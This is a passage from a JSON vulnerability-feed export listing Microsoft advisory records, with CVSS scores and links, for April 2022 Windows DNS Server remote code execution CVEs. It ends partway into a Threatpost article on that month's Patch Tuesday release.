"2022-04-12T08:00:00", "id": "MS:CVE-2022-26826", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26826", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:16", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26824", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26824", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:16", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26829", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26829", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:17", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26819", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26819", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:17", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26820", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26820", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:17", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26817", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26817", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:18", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26814", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26814", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:16", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26825", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26825", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:16", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26823", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26823", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:23", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26812", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26812", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:23", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26811", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26811", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:20", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-24536", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24536", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:18", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26815", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26815", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:23", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26813", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26813", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2022-04-19T21:01:27", "description": "Microsoft has released patches for 128 security vulnerabilities for its April 2022 [monthly scheduled update](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Apr>) \u2013 ten of them rated critical (including three wormable code-execution bugs that require no user interaction to exploit).\n\nThere are also two important-rated zero-days that allow privilege escalation, including one listed as under active exploit.\n\nThe bugs in the update are found across the portfolio, including in Microsoft Windows and Windows Components, Microsoft Defender and Defender for Endpoint, Microsoft Dynamics, Microsoft Edge (Chromium-based), Exchange Server, Office and Office Components, SharePoint Server, Windows Hyper-V, DNS Server, Skype for Business, .NET and Visual Studio, Windows App Store and Windows Print Spooler Components.\n\n\u201cThis large volume of patches hasn\u2019t been seen since the fall of 2020. However, this level is similar to what we saw in the first quarter of last year,\u201d Dustin Childs, researcher at Trend Micro\u2019s Zero Day 